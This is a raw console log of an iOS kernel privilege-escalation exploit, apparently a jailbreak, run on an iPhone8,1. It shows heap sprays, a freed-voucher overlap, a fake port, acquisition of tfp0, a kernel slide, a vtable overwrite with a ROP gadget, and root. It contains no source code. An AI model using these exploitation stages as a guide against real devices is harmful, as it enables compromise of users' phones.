[D] platform: iPhone8,1 16C101
[+] created 1024 pipes
[+] created 8000 ports
[+] sprayed 16646144 bytes to 1016 pipes in kalloc.16384
[+] created 3564 vouchers
[+] sprayed 315752448 bytes to 8 ports in kalloc.1024
[+] stashed voucher pointer in thread
...........................................................................................................................................................................
[+] sprayed 357924864 bytes of OOL ports to 4 ports in kalloc.32768
[+] recovered voucher port 0x2e8207 for freed voucher
[+] adding references to the freed voucher to change the OOL port pointer
[+] receiving the OOL ports will leak port 0x1ec003
[+] received voucher port 0x2e8207 in OOL ports
[+] voucher overlapped at offset 0x7ca0
[+] received fake port 0x971b
[+] port is at pipe index 169
[+] got ip_requests at 0xffffffe0066c60a0
[+] fake port is at offset 12600
[+] base port is at 0xffffffe006a07138
[+] kernel_task is at 0xffffffe00050d680
[+] done! port 0x971b is tfp0
Noncereboot Baslatiliyor...
[D] found kernel slide 0x0000000002800000
slide: 0x0000000002800000
got user client: 0x980f
Found port: 0xffffffe006a051b8
Found addr: 0xffffffe005f0ed40
Found vtab: 0xfffffff009665da8
Created fake_vtable at ffffffe0000c8000
Copied some of the vtable over
Created fake_client at ffffffe0000cc000
Copied the user client over
Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndexour proc is at 0xffffffe00693e7b0
kern proc is at 0xfffffff009e6c988
[D] UID: 0